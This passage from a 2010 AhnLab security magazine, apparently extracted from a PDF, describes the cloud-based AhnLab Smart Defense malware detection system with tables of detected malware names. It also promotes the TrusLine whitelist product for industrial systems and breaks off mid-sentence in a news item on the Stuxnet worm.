<새로운 위협에 대한 실시간 대응이 피해 최소화의 가장 중요한 열쇠>

10


AhnLab Smart Defense(이하 ASD) 는 기존에 악성코드에 대한 모

든 데이터를 PC로 다운로드 한 후 PC에서 처리하던 방식과 달

리 Cloud Computing 개념을 이용한 새로운 기술이다. 즉, 대규모

파일 DB를 중앙서버에서 관리하며, PC에 설치되어 있는 AhnLab

Smart Defense 엔진에서 파일의 악성여부에 대해 문의하면 이에

대해 응답을 해주는 방식이다. AhnLab Smart Defense의 작동 방

법은 아래와 같다.

PC에 설치된 AhnLab Smart Defense 엔진을 통해 생성된 DB에

서 기존에 검사한 파일인지 확인한다. 새로운 파일로 확인되면,

AhnLab Smart Defense Center로 파일 DNA*를 전송한다. AhnLab

Smart Defense Center는 전송된 파일 DNA 정보를 대용량 DNA

DB에서 해당 DNA의 유형이 있는지 확인하고, 같은 유형의 DNA

가 존재하면 기 분석된 DNA정보, 즉 악성코드인지 정상 파일인

지 확인하여 알려준다. 만약 전송 받은 파일 DNA가 DB에서 확

인이 되지 않으면, 새로운 유형으로 간주하여 분석에 필요한 파

일의 특정 부분을 전송 받는다. 전송받은 파일은 즉시 자동 분석

시스템으로 보내져 새로운 DNA의 악성 여부를 분석하게 된다.

AhnLab Smart Defense Center에서는 파일의 기본 정보, 프로그

램 디지털 서명 정보 분석, 평판 시스템을 통한 분석, 파일에 대

한 Activity 동향 분석, 행위 기반 Activity 분석, 파일간 Relation 분

석 등 다양한 기술을 이용하여 파일의 정상 또는 악성 여부를 판

단하고, 이를 AhnLab Smart Defense 엔진에 알려준다. 이와 동

시에 파일 DNA DB를 업데이트하여 다른 AhnLab Smart Defense

엔진에서 활용할 수 있도록 한다.

AhnLab Smart Defense에서 제공하는 두 번째 기능은 DNA Scan

기능이다. DNA Scan 기능은 악성코드가 가지고 있는 DNA를 추

출하여 이와 매칭되는 파일을 검출하는 방식이다. DNA Scan은

악성코드들이 보유하고 있는 악성 DNA만 추출하여 이를 패턴화

하고, 이와 동일한 DNA를 가지고 있는 파일을 악성코드로 분류

하는 엔진을 기존 Anti-Malware 엔진과 함께 업데이트 하여 진단

하는 방식을 취하고 있다. 이 방식을 사용하면 다음의 장점이 있

다.

AhnLab Smart Defense 란 무엇인가

02

Cloud 개념의 새로운 접근 방식,

[그림 1] AhnLab Smart Defense 구성도

[그림 2] AhnLab Smart Defense Center

파일 DNA Map 분석을 통한 DNA Scan

11

AhnLab Smart Defense Database를 분석해 본 결과 대부분의 악

성코드는 일반 프로그램과 달리 악성코드만 가지고 있는 특징이

존재하였다. 이에 따라 악성코드만 가지고 있는 특징을 DNA Rule

로 만듦으로써 현재 나와있는 악성코드뿐 아니라 향후 발생할 수

있는 신종 악성코드에 대해서도 동일한 특징을 가지고 있을 경우

검출 가능해짐에 따라 기존 Anti-malware가 가지고 있던 사후처

리 방식의 한계를 극복할 수 있다.

하루에도 수천 ~ 수만 개의 악성코드가 발생하고 있기 때문에

Anti-Malware 솔루션의 엔진 사이즈도 지속적으로 증가하고 있다.

DNA Scan 방식을 사용하면 하나의 DNA Rule로 수십 ~ 수천 개

의 악성코드를 탐지 가능해짐에 따라 엔진 사이즈 증가가 거의

없는 상태에서도 높은 진단율을 유지할 수 있게 된다.

일반적인 휴리스틱 진단 방식은 분석가의 지식에 의해 방식이 추

가되고, 기본적인 화이트 리스트 테스트를 통해 배포될 수 밖에

없다. 이에 따라 대규모의 화이트 리스트에 대한 검증에는 시간

이 오래 걸리므로 오진에 취약한 구조를 가지고 있다. DNA Scan

의 경우 악성코드의 패턴을 생성할 때마다 수백억 개의 정상 파

일 DNA와 매칭한 후 이상이 없을 경우에만 배포함으로써 사전

진단 율은 높이면서도, 오진의 위험도는 극적으로 낮추는 엔진의

개발이 가능해졌다.

AhnLab Smart Defense의 핵심은 HAS(Hybrid Analysis System) 라

고 명칭 되는 대규모 자동 분석 시스템이다. 신종 악성코드가 하

루에도 수백 ~ 수만 개씩 새로이 생성되는 현재 상황에서 이를

분석가가 일일이 손으로 확인하는 것은 물리적으로 불가능하다.

HAS는 새로이 수집된 파일을 자동으로 파일의 기본 정보, 프로그

램 디지털 서명 정보, 평판 시스템, 파일에 대한 Activity 동향, 행

위 기반 Activity, 파일간 Relation 등 다양한 기술을 이용하여 분석

하고, 파일의 악성 유무를 판단하는 방식을 취하고 있다. AhnLab

Smart Defense는 그간 다양한 OS를 지원해야 하고, PC의 리소스

사용을 최소화 해야 하는 등의 이슈로 Anti-Malware 솔루션에 적

용하기 힘들었던 다양한 분석 방식을 서버의 컴퓨팅 파워를 활용

하여 분석함으로써 보다 정밀한 내용을 최단 시간에 분석할 수

있는 장점이 있다.

두 번째 주요 기술은 악성코드의 DNA 추출을 위한 DNA 맵 구성

이다. 인간의 질병연구를 위해 DNA 맵을 그리는 게놈 프로젝트

를 진행하였듯이 AhnLab Smart Defense에서는 악성코드의 DNA

를 추출하기 위해 AhnLab Smart Defense Database에 보유하고

있는 1억 개 이상의 파일을 대상으로 500억 개 이상의 특장점을

분류하여 인간의 DNA 맵과 같이 파일 DNA 맵을 구성하였다. 이

렇게 구성된 DNA 맵을 분석하여 악성코드만이 보유하고 있는 특

정 DNA를 추출하여 Rule로 만듦으로써 기존의 휴리스틱 진단법

과는 다른 높은 효율의 사전 방역 기능과 오진 가능성을 최소화

시킨 새로운 악성코드 대응 방법이 가능해졌다.

[그림 3] 사람의 DNA와 파일 DNA의 비교

ASD에 적용된 주요 기술 소개 신종 악성코드에 대한 사전 대응

엔진 사이즈 증가 이슈 해결

오진 대응을 위한 검증 시스템 구축

사람의 DNA

정신분열발현 염색체

심장관계질환발현 염색체

비만 염색체자궁암 발현 염색체

File DNA

질환 발현 염색체 규칙, 위치 발견 및 진단, 치료

악성코드 고유의 특성 발현 항목(DNA)의규칙 발견 및 진단, 치료

IMAGE_DOS_HEADERSETUP_CODE

IMAGE_FILE_HEADERIMAGE_OPTIONAL_HEADER

DATA DIRECTIORYIMAGE_SECTION_HEADER[0]IMAGE_SECTION_HEADER[1]

--

Padding.text(CODE).data(DATA

Padding.idata

.didataPadding

--

.relocPadding

.rsoPadding

tls.debug.Padding

.edata---

특정 정보 전송

타 프로그램 감염

은폐, 자동실행

12


AhnLab Smart Defense는 기존에 사용자에게 일방적으로 악성코

드 패턴 DB를 내려 검사/치료하는 방식이 아닌 사용자와 AhnLab

Smart Defense Service간의 양방향 통신을 통해 보다 정확한 악

성코드 대응 및 악성코드 활동 패턴의 분석이 가능하다.

현재 AhnLab Smart Defense는 수백만 명의 사용자가 사용을 하

고 있으며, 사용자들이 AhnLab Smart Defense에 파일 DNA를 보

내 악성코드 여부를 체크하는 행위만으로도 해당 데이터를 자동

분석하여 새로이 보고된 악성코드 현황 및 현재 가장 활동을 많

이 하고 있는 악성 코드의 순위 등을 확인할 수 있다. 이를 활용

하면 기존에 분석가 또는 관리자의 감에 의해 진행되었던 악성코

드 대응 업무를 정확한 데이터를 가지고 우선 순위 하에서 대응

가능하다. 예를 들어 새로이 나타난 악성코드의 전파 속도가 어

떠한지, 어떤 악성코드에 가장 많이 감염되고 있는지 등 기존에

파악하기 힘들었던 위협 상황을 데이터를 통해 한눈에 확인할 수

있다. 이에 따라 동일한 업무를 수행하더라도 우선 순위를 가지

고 악성코드에 대응함으로써 보다 효과적인 대응이 가능하다.

AhnLab Smart Defense,어떤 효과를 가져다 주는가

03

[그림 1] 새로이 수집된 악성코드 리스트

AhnLab Smart Defense 기대 효과

실시간 악성코드 현황 분석

수집 날짜 파일명 파일 크기 ASD 진단명 접수 ASDP 접수 감염PC수

2010-08-20 10:17:27 maychi.exe 96,256 Backdoor/Win32.Bredolab 100 100 1

2010-08-20 10:14:57 1620040ee1fc903af62debd... 187,904 Trojan/Win32.Hiloti 100 100

2010-08-20 10:14:55 nabi[1].exe 141,824 Downloader/Win32.Forbid 100 100 8

2010-08-20 10:14:30 zaimpactstrength.exe 766,464 Trojan/Win32.Sadenav 100 100

2010-08-20 10:13:27 cqldrllkl.exe 768,000 Trojan/Win32.Sadenav 100 100

2010-08-20 10:11:43 exe.exe 85,504 Trojan/Win32.FakeAV 100 100

2010-08-20 10:11:40 ddf437b511ec25d4a5e5x56...... 98,304 Trojan/Win32.FakeAV 100 100

2010-08-20 10:11:06 d23dcd17811eaeae84fc4b 94,720 Backdoor/Win32.Bredolab 100 100

2010-08-20 10:10:10 63f74d72e676435b6b22b91... 61,440 Trojan/Win32.FakeAV 100 100

2010-08-20 10:08:01 CDROM.SYS 84,800 Trojan/Win32.Patched 100 100 1

2010-08-20 10:06:29 sample.exe 35,840 Trojan/Win32.CSon 100 100

2010-08-20 10:06:04 apr.exe 3,858,432 Dropper/Wind32.AdrenaPatched 100 100 3

2010-08-20 10:06:04 kgh.dll 48,012 Trojan/Win32.FraudPack 100 100

2010-08-20 10:05:38 kgh.dll 48,012 Trojan/Win32.FraudPack 100 100

2010-08-20 10:05:06 A057RE18.dll 643,584 Trojan/Win32.Overtls 100 100 1

2010-08-20 10:02:10 C__WINDOWS_apsesf.dllx 77,312 Trojan/Win32.Hiloti 100 100

2010-08-20 10:01:47 C__WINDOWS_system32_a... 20,480 Trojan/Win32.Bredavi 100 100

2010-08-20 09:59:30 qney.exe 194,048 Trojan/Win32.OnlineGameHack 100 100 1

2010-08-20 09:59:29 14a38041e080a3cf22b6c4c... 96,768 Backdoor/Win32.Bredolab 100 100

2010-08-20 09:58:01 C__WINDOWS_help.dllx 94,208 Backdoor/Win32.Cindyc 100 100

13

DDoS공격을 위한 봇의 경우 활동을 하기 전까지는 해당 파일에

대한 악성코드 여부를 판단하기는 아주 어렵다. AhnLab Smart

Defense의 경우 정상적인 인터넷 접속이 아닌 특정 파일이 특

정 시간대에 갑자기 트래픽을 증가시키고, 이것이 많은 사용자들

에게서 동시 다발적으로 발생한다면 DDoS 공격일 확률이 높다

고 판단하여 별도로 관리하도록 되어있다. 해당 기술을 이용한다

면 이미 공격이 끝난 후 사후 처리만 가능했던 DDoS 방어를 한

단계 업그레이드 하여 DDoS 공격 초기에 대응할 수 있는 방안을

제공할 수 있다. 추가적으로 공격자 IP 정보까지 제공 가능함에

따라 DDoS 전용 장비나 방화벽 등을 통해 DDoS 공격을 초기에

진압할 수 있는 중요한 정보를 얻을 수 있다.

이상 행위를 하는 파일을 수집하더라도 해당 파일의 내용을 분

석하는 것은 전문가라도 쉽지 않은 게 현실이다. AhnLab Smart

Defense는 수집된 파일의 정보를 HAS를 통해 자동으로 분석해

냄으로써 분석 전문가가 아닌 사람도 해당 파일의 특장점을 파악

할 수 있는 기능을 제공하고 있다.

2009년 7월 7일 발생한 7.7 DDoS 대란으로 발생한 피해액은 얼

마나 될까. 현대경제연구원은 피해액이 최소 363억 원 ~ 544억

원이라고 밝혔다. 지난 2003년 발생한 1.25 인터넷대란 피해액은

1,675억 원에 이르는 것으로 추정된다. 사이버 공격은 경제적, 사

회적으로 엄청난 피해를 초래하고 있다. 특히, 세계적인 경기 침

체로 인한 악성코트 제작이 리스크가 적은 쉬운 돈벌이 수단이

되면서 많은 범죄조직이 악성코드 제작에 달려들면서 공격이 더

욱 증가하고 있다. 이에 대응하기 위해 보안 업체들도 각고의 노

력을 기울이고 있다. 하지만 기존의 대응 방식으로 현재 발생하

는 있는 사이버 공격을 방어하기엔 한계가 존재한다. 따라서 이

제는 더 이상 기존의 개념에서 벗어나 새로운 접근 방법이 필요

한 시점이다. 안철수연구소의 AhnLab Smart Defense는 클라우드

컴퓨팅 개념의 혁신적인 기술로서 수천만 개의 악성코드 데이터

를 중앙 서버에서 관리하면서 악성코드인지의 여부를 실시간 확

인해 주는 기술이다. 이 ASD 기술은 안철수연구소 클라우드 플

랫폼인 ACCESS (AhnLab Cloud Computing E-Security Service)의

핵심 기술로서 적용되어 있다. 안철수연구소의 ACCESS 전략은

ASD 기술과 기존 ASEC(시큐리티대응센터)의 악성코드 수집 및

분석 능력과 CERT(침해사고대응팀)의 위협 모니터링 및 대응 서

비스가 결합한 새로운 개념의 지능형 플랫폼이다. 안철수연구소

의 모든 제품과 서비스는 ACCESS 전략 하에 유기적으로 작동하

여, 각종 보안 위협에 대해 입체적이고 종합적인 대응이 가능하

다. 안철수연구소는 클라우드 컴퓨팅 개념의 ASD와 ACCESS 전

략이 고객의 안전한 컴퓨터 환경 조성에 기여할 수 있을 것이라

고 확신한다.

[그림 2] 현재 가장 활동을 많이 하고 있는 악성코드 순위 리스트

수집 날짜 파일명 Activity - 최근 5분 Activity - 누적 ASD 진단명

2010-07-27 12:50:13 favoclick.dll 213,787 585,626,495 Adware/Win32.Agent

2010-03-20 12:55:03 msgsvccln.exe 30,234 629,123,188 Malware/Win32.Generic

2010-06-05 13:08:31 btci08.dll 23,199 38,979,017 Malware/Win32.Generic

2010-08-06 03:20:42 setup_donkeyp2p_1.48ka2[... 16,583 4,489,423 Adware/Win32.Mycashbag

2010-07-05 18:48:15 protectinfo.exe 15,628 30,017,459 Malware/Win32.Generic

2010-07-31 07:40:19 sideover.exe 15,593 48,133,651 Trojan/Win32.Gen

2010-04-22 08:00:04 [솔로용] 버림받은 남자들의 놀... 15,106 12,298,735 Trojan/Win32.Mepaow

2010-07-22 10:31:55 WINDOC.EXE 13,948 1,214,013 Downloader/Win32.Agent

2010-08-01 21:33:34 fd2fc3a22b7639a56053c05f... 13,873 7,793,475 Backdoor/Win32.Poison

2010-08-04 23:22:32 taskenr.exe 12,226 38,328,586 Malware/Win32.Generic

2010-07-16 01:41:53 dqbevf.dll 10,672 553,915 Backdoor/Win32.Ellikic

2010-07-22 01:08:12 nvinstsmx.exe 9,973 375,702 Malware/Win32.Generic

2010-08-03 11:53:43 deskbar_shoppingUpdate.exe 8,576 712,283 Trojan/Win32.Vilsel

2010-07-23 10:28:53 PcPrivacyUp.exe 8,494 5,525,347 Malware/Win32.Generic

2010-07-01 22:28:09 winbcls.dat 7,748 517,230,461 Trojan/Win32.Agent2

2010-06-01 15:16:43 Gilautouc.exe 6,523 15,732,814 Trojan/Win32.Vb

2010-05-13 03:23:29 라이프운세.exe 5,345 9,832,961 Trojan/Win32.Mepaow

DDoS 공격 대응

해당 악성코드의 특장점 분석

안철수연구소의 클라우드 전략,ASD와 ACCESS

SiteGuard

SiteGuard

V3 ProductsTrusGuard DPX TrusGuard Series

데이터센터 / 서비스제공

[그림 3] 안철수연구소의 ACCESS 전략

14

2010.09

일반적으로 사무실에서 업무용으로 사용하는 PC는 주기적으로

업그레이드나 교체되어 가장 최신의 하드웨어 사양을 가지고 있

다. 또한 설치되어 있는 운영체제와 애플리케이션의 버전도 비교

적 최신의 것인 경우가 많으며, 프로그램의 설치와 사용이 자유

롭게 허가되어 있다. 이와는 반대로 특정한 생산 시스템의 운영

을 위하여 설치되는 되어 운용되는 대부분의 산업용 시스템은 한

번 도입되면 감가상각에 의한 라인의 폐쇄 시까지 교체 없이 운

용되는 경우가 많다. 이러한 산업용 시스템은 일반적인 PC에 비

하여 제한적인 기능을 담당하는 경우가 많고, 라인의 생산성이

우선시되므로 운용 프로그램의 충돌 및 재부팅 가능성 때문에 프

로그램의 업데이트나 OS의 패치로부터도 자유롭지 못하다. 일반

적인 사무 환경의 PC에는 다양한 프로그램을 설치하여 사용되어

있으며 그 숫자도 많게는 50여 종에 달한다. 하지만 산업용 시스

템은 사용이 엄격하게 제한되어 10여 개 미만의 프로그램이 동작

하게 된다. 이렇게 작은 숫자의 프로그램을 운용하기 위해서 개

방형 시스템으로 설치와 사용을 허용하는 것이 아니라 폐쇄형 시

스템으로 허가된 프로그램만 사용하도록 제한하는 것이 보안의

위협을 줄여서 생산성을 유지하는 데 더욱 바람직한 방법이 될

것이다.

산업용 시스템의 가장 큰 목적은 시스템이 안정적으로 동작하여

중단 없는 생산 및 운영이 가능하도록 제어하는 것이다. 하지만

이 시스템들도 인터넷이나 네트워크에 연결이 되어 있거나, USB

등과 같은 장치 및 포트를 통하여 데이터를 주고 받기 때문에 보

안 위협으로부터 자유로울 수가 없다. 그래서 일반 사무용 PC에

서 사용하는 백신 프로그램을 설치하여 사용한다. 하지만 OS나

프로그램에 대한 업그레이드나 패치가 제때 이루어지지 않고, 장

비의 사양이 낮은 상태에서는 보안 솔루션도 완벽한 기능을 제공

하기 어려운 상황이다. 산업용 시스템의 경우 1년 365일 안정적

으로 운영되어야 하므로 악성코드 침해 사고는 직접적인 매출의

손실, 기업 이미지 저하, 피해 복구를 위한 금전적 비용 지출 및

생산 효율성 저하 등 보다 심각한 이슈를 야기할 수 있다. 따라

서 생산 및 서비스 기업에서 보안 사고가 한 번 발생하면 그 직

접적인 피해가 매우 크며 복구하여 시스템을 정상화 하는 데에도

많은 시간과 비용이 소요된다. 따라서 산업용 시스템을 관리하는

관리자는 [그림 1]과 같은 현실적인 문제에 직면해 있다.

앞서 언급했듯이 특정 목적의 산업용 시스템도 일반 사무용 PC

와 마찬가지로 보안 위협으로부터 자유롭지 못하다. 더욱이 시스

템 환경상 잦은 패치와 실시간 업데이트가 시스템 안정성을 크게

위협하는 것 또한 사실이다. 이는 산업용 시스템의 환경적인 특

성뿐만이 아니라 악성코드의 변화와 백신 프로그램이 지닌 태생

적 한계와 무관하지 않다. 이와 관련해 산업용 시스템에서 기존

의 백신 프로그램을 그대로 적용할 수 없는 이유와 새로운 해결

책에 대해 알아보자.

AhnLab TrusLine, 산업망 노리는 악성코드에 대응하라NEW PRODUCT

산업용 시스템 전용 보안 솔루션, AhnLab TrusLine

산업망 노리는 악성코드에 대응하라

산업용 시스템에서 발생하는 이슈

이란 원전을 감염시킨 '스턱스넷(Stuxnet)'으로 전세계가 들썩이고 있다. 전세계 보안 전문가들이 '스턱스넷'을 주목하고 있다. 이 악성코드가 '국가의 주요

산업 시설 파괴'를 타깃으로 만들어졌기 때문이다. 이는 지금까지의 위험과는 차원이 다른 보안 위협의 새로운 패러다임 시대가 열린 것을 의미한다.

안철수연구소는 지난 9월 산업용 시스템 전용 보안 솔루션 'Ahnlab TrusLine(안랩 트러스라인)'을 선보였다. 특정 목적의 산업용 시스템은 사용 목적 및 환

경의 차이에 의해 일반적 환경에서는 문제가 되지 않는 부분이 크리티컬한 문제로 발전할 수 있는 가능성이 존재한다. 특정 목적의 산업용 시스템의 사용

환경 및 특화된 요구사항이 무엇인지 살펴보고, 이러한 시스템의 경우 어떠한 보안 대책을 가지는 것이 좋을지 살펴보고자 한다.

일반 PC와 산업용 시스템의 환경적 차이

기존 백신 프로그램의 한계와 새로운 해결책

15

컴퓨팅 환경의 개선과 더불어 악성코드의 증가 속도도 가파르게

상승하고 있다. 악성코드 제작자들은 공격 대상, 공격 방법, 공격

시간, 동원할 봇넷의 숫자 등을 입력하면 악성코드를 만들어 주

는 자동화 툴을 이용하여 아주 손쉽게 코드를 만들어 내고 있다.

반면, 백신 프로그램을 제공하는 보안 전문 회사들은 더 많은 악

성코드를 잡기 위하여 시그니처의 업데이트에 노력하고 있지만,

과거 20년 동안 패턴에 기반하여 업데이트한 시그니처의 숫자보

다 최근 1개월 동안 업데이트한 시그니처의 숫자가 더 많을 만큼

패턴에 기반한 업데이트 방식의 한계에 다다르고 있다. 백신 프

로그램은 악성코드가 발견되면 이를 수집한 후 분석하여 엔진에

포함하여 배포하는 사후처리 방식을 사용하고 있다. 따라서 현재

와 같이 악성코드의 숫자가 기하급수적으로 늘어나는 시점에서

단 시간 내에 모든 신종 및 변종 악성코드를 효과적으로 방어하

기에는 한계가 존재한다. 또한, 업데이트 시그니처 숫자의 증가는

엔진 사이즈 증가라는 또 다른 이슈를 제공하고 있다. 백신 제품

을 테스트하는 AV-test.org에 따르면 45개의 백신 제품을 테스트

해 본 결과 최근 18개월 동안 대부분의 백신 제품의 엔진 사이즈

가 두 배 이상 증가했다. 이를 다운로드 받기 위하여 네트워크의

트래픽에 부담을 주고, 다시 실행하기 위하여 메모리에 올리는

부담까지 더욱 커져서, 아무리 하드웨어 사양이 좋아졌다고 해도

다양한 애플리케이션을 실행하는 환경에 부담을 주는 것이 사실

이다. 결론적으로 기존 백신 프로그램은 신종 및 변종 악성코드

를 사전에 방어할 수 없고, 기하급수적으로 증가하는 악성코드를

방어하기 위해 점점 엔진 사이즈를 키울 수밖에 없는 태생적 한

계를 내재하고 있다. 특히, 저사양 시스템과 24시간 무정지 시스

템을 추구하는 산업용 시스템의 환경적인 조건에서 기존 백신 프

로그램을 그대로 적용하기엔 무리가 따른다.

그렇다면 산업용 시스템을 위한 보안 솔루션은 어떤 것이어야 할

까? 산업용 시스템의 환경과 보안요구사항을 통해 해결책을 찾아

보자.

산업용 시스템 보안 관리자의 요구사항

1) 악성코드로 인한 장애가 없어야 한다

2) 시스템 사양이 낮은 장비이므로 리소스 점유가 적은 보안 솔

루션이어야 한다

3) 허가하지 않은 프로그램의 설치와 예외적인 행동을 규제할 수 있는 환경이 마련되어야 한다

이러한 요구사항을 충족하기 위해서는 기존의 보안 솔루션이 가

지고 있는 컨셉을 벗어나서 새로운 방식을 적용해야만 한다. 이

에 안철수연구소는 자사가 보유한 여러 가지 원천 기술을 바탕으

로 산업용 시스템의 환경에 적합한 새로운 보안 솔루션을 고려

하기 시작했다. 이러한 고민의 결과로 탄생한 것이 안철수연구소

트러스라인(AhnLab TrusLine, 이하 안랩 트러스라인)이다.

[그림 1] 산업용 시스템을 관리하는 시스템 관리자의 고민

악성코드의 변화와 백신 프로그램의 한계

[그림 2] 신종 악성코드 발생 추이

불필요한 프로그램의리소스 낭비

정해진 프로그램만 쓰도록 하고 싶다

장비를 위하여 필요한 프로그램은 제대로 동작

불필요한 프로그램의 실행을 막아서 시스템 운영 유지

사용하는 포트 이외에는 모두 block 하여 효율성 향상

악성코드 감염에 따른시스템 피해 방지

새로운 악성코드에 대응할 수 있어야 한다

악성코드로 인한 시스템의 감염과 장애 최소화

악성코드로 발생하는 이상 트래픽과 네트워크 장애 방지

보안프로그램의 엔진 업데이트와 패치는 최소화

솔루션의 패치로 인한시스템의 정지

장비 전용의 시스템을 장애 없이 운영하고 싶다

특정 장비 전용으로 사용하므로 시스템 사양이 낮음

시스템에 이상이 있을 경우 생산성에 큰 영향

제품의 업데이트나 패치로 인한 장애 최소화 필요

산업용 시스템의 요구사항과 새로운 해결책

16

안랩 트러스라인은 시스템의 안정적 운용에 대한 민감도가 높고,

정해진 프로그램만 사용하는 산업용 시스템에 최적화된 전용 보

안 솔루션이다. 이 솔루션은 허용된 프로그램만 설치 및 실행 가

능하게 함으로써 바이러스 등 악성코드의 침입을 사전에 방지할

수 있으며, 악성코드를 이용한 정보유출도 방지할 수 있다.

안랩 트러스라인의 특징은 다음과 같이 정리할 수 있다.

안랩 트러스라인은 관리자가 승인한 프로그램은 리스트에 등록하

여 허용된 상태 그대로 동작하도록 하고, 리스트에 없는 프로그

램은 실행을 거부하는 화이트 리스트(white List) 방식을 채택하였

다. 이에 비해 기존 범용 백신 프로그램은 악의적인 행동을 하는

프로그램을 블랙 리스트(black List) 기반으로 관리하는 방식이다.

안랩 트러스라인은 사용자 환경에 맞는 리스트를 수집하고 관리

하기 위하여 사전에 사용자 환경에 대한 점검 및 설정 과정을 거

치게 되며, 이러한 과정을 통하여 사용 환경에서 운용되는 특수

한 목적의 프로그램에 대한 파악과 운용 지원을 하게 된다.

일반적인 산업용 시스템 환경에서는 운영 체제의 보안 패치나 서

비스팩은 원하지 않아도 설치를 해야 하는 경우가 발생하고, 설

치된 프로그램들도 업데이트가 요구된다. 하지만 안랩 트러스라

인은 설치하여 운용에 필요한 상태를 그대로 유지하도록 Locking

된 상태를 유지해준다. 물론 새로운 업데이트나 설치가 필요할

경우는 Unlock의 상태로 전환하여 정상적인 설치 활동을 보장한

다. 따라서 운영 체제의 패치, 서비스팩, 백신 프로그램의 업데이

트, 라인 관리 프로그램의 패치 등을 제한할 수 있다. 업데이트가

필요한 경우는 정기적인 라인 점검 시기에 스케줄링하여 진행하

거나, Lock 상태를 해제하고 진행하면 된다.

안랩 트러스라인은 전체 시스템을 구성하고 있는 개별 클라이언

트 시스템에 엔진 업데이트를 실시하지 않는다. 악성코드 대응

엔진은 관리 서버에만 존재하여 업데이트를 하고, 개별 클라이언

트 시스템은 서버에서 생성한 화이트 리스트를 기반으로 실행 제

어를 하게 된다. 즉, 악성코드의 검사와 화이트 리스트의 업데이

트는 관리 서버에서 이루어진다. 따라서 매번 업데이트 시에 생

산/운영 효율성을 떨어뜨리는 CPU의 점유나 네트워크의 점유를

걱정할 필요가 없다.

안랩 트러스라인의 관리서버는 개별 클라이언트에 설치되어 있

는 파일의 DNA를 전달받아 관리 서버의 화이트 리스트 데이터베

이스에서 안전한 파일인지 아닌지 확인한 후 결과값을 전송한다.

또한 관리서버의 화이트 리스트 데이터베이스에 없는 파일의 경

우 해당 파일을 전송받아 최신 백신 엔진을 사용하여 검사 후 결

과값을 업데이트 하고, 개별 클라이언트로 전송하도록 되어 있다.

또한 Unlock 모드에서 개별 클라이언트에 새로운 프로그램이 설

치되면 자동으로 해당 파일의 분석을 관리서버에 요청하도록 구

성되어 있다. 이에 따라 언제나 무결성이 검증된 파일로만 실행

하는 환경을 구축할 수 있다.

산업용 시스템 전용 보안 솔루션, AhnLab TrusLine

[그림 3] 산업용 시스템 관리자의 요구사항과 해결책

화이트 리스트(White List) 기반의 보안 솔루션

업데이트, 패치, 업그레이드의 불필요

[그림 4] 안랩 트러스라인(AhnLab TrusLine) 제품 컨셉

실행파일 IP/Port 차단Lock Engine

실행파일 IP/Port 차단Lock Engine USB 자동실행방지

정책 설정(지정된 프로그램만 설치/사용)

악성코드 분석 업데이트 및 패치작업 최소화

Signiture Update관리 콘솔

엔진 업데이트로 인한 시스템 부하를 제거

관리 서버와의 유기적 연동을 통한 실행 파일 무결성 검증

24시간 생산라인 가동 Anti-Malware악성코드로 인한 시스템의 감염과 장애 최소화

악성코드로 발생하는 이상 트래픽과 네트워크 장애 방지

보안프로그램의 엔진 업데이트와 패치는 최소화

악성코드로 인한 장애가 없어야 한다

저사양 PCLight-Weight

Based보안솔루션

메모리, CPU 점유율 낮음

설치된 프로그램에 대해서만 검사 설정으로 DB 사이즈 최소

추가 프로그램 설치 전에는 DB 사이즈 고정

시스템 사양이 낮은 장비이므로리소스 점유가 적어야 한다

제한된 프로그램 사용ApplicationControl Port

차단

불필요한 프로그램의 실행을 막아서 시스템 운영 유지

사용하는 포트 이외에는 모두 block 하여 효율성 향상

정해진 프로그램만사용할 수 있도록 하고 싶다

17

안랩 트러스라인이 적용되어 Locking된 시스템은 화이트 리스트

를 기반으로 운용되기 때문에 이 리스트에 존재할 수 없는 악성

코드의 실행이 차단된다. USB 메모리를 통한 오토런(autorun)의

실행과 감염, 포트를 통하여 전파되는 웜 등의 실행 자체가 불가

능해지며, 신종 악성코드도 리스트에 등록될 수 없기 때문에 감

염이 될 수 없다.

안랩 트러스라인은 실행 프로그램의 제어 만으로는 해결하기 힘

든 악성코드의 침입에 대비하기 위해 산업용 시스템에 설치된 프

로그램이 사용하는 IP와 Port만 오픈 함으로써 보다 완벽한 보안

환경을 구축할 수 있다. 특히 기존에 백신 프로그램과 함께 설치

되었던 Personal Firewall이 범용적 환경 지원을 위해 다양한 기능

을 추가함으로써 발생했던 리소스 점유율을 최소화함으로써 저사

양의 산업용 프로그램에서도 안정적으로 사용할 수 있는 기능을

제공하고 있다.

사용자들에게 USB 메모리나 공유 폴더 사용을 금지해도 100% 막

을 수 없다. 하지만 안랩트러스라인은 불필요한 프로그램 실행을

차단하므로 위험의 수준을 낮추고 관리의 편의성을 자연스럽게

확보할 수 있다.

산업용 시스템 관리자들은 신종 및 변종 악성코드의 감염, 잦은

업데이트와 패치, 재부팅, 사고 대응 등으로 골머리를 앓고 있다.

생산성과 보안이라는 두 마리의 토끼를 쫓다 보면 업무 성과보

다는 격무와 스트레스에 시달리게 되는데, 발상의 전환을 통하여

새로운 시각을 가질 필요가 있다. 산업용 시스템의 생산 및 서비

스의 안정성을 보장하면서 사용 환경 관리 및 보안 이슈까지 해

결할 수 있는 방법은 일반적인 보안 솔루션의 적용이 아니라 시

스템의 목적에 맞는 보안 환경을 구축하는데 있다. 이를 통하여

내부 환경을 자연스럽게 관리할 수 있는 관리 시스템을 만들고,

만약에 발생할지 모르는 보안 사고를 예방하여 안정적인 시스템

운영이 가능하다.

악성코드의 감염 및 신종 악성코드에 대한 예방

악성코드 침입 루트를 차단하기 위한 IP & Port 차단 기능

시스템 관리 정책의 자연스러운 적용

우리가 추석명절과 중부지방에 쏟아진 '물폭탄' 피해 ·복구에 관심이 온통

쏠려있을 때인 9월 24일, BBC ·뉴욕타임즈 ·파이낸셜타임스(FT) 등 여러 외

신은 이란의 핵시설 파괴를 노린 것으로 추정되는 악성 웜의 확산 소식을

전하느라 분주했습니다.

문제의 이 웜은 마이크로소프트 취약점을 악용한 '스턱스넷(Stuxnet)'으로,

주로 USB 이동식저장장치를 통해 감염시키는 악성코드입니다. 지멘스의

산업시설 제어장치를 감염시킨 후 산업시설에 침투해 오작동을 일으키거

나 작동을 중단시키는 것으로 알려져 있습니다. 이 웜은 지난 6~7월 처음

발견됐지만 1년 전부터 활동한 것으로 추정되고 있습니다. 시만텍 등 보안

업계는 이 웜이 산업시설을 대상으로 제작된 최초의, 아주 정교한 악성코

드라는 분석을 내놓고 있는데요. 이미 이란 뿐 아니라 인도네시아, 파키스

탄, 인도 등에서도 감염 사고가 보고된 상황입니다. 그중에서도 이란에서

가장 많은 피해를 본 것으로 분석되고 있지요.

뉴욕타임스는 9월 26일(현지시간), 이란 정부 관계자의 말을 인용해 "이 웜

이 이란 내 컴퓨터 3만대에 영향을 미쳤다. 이는 이란에 대한 사이버(전

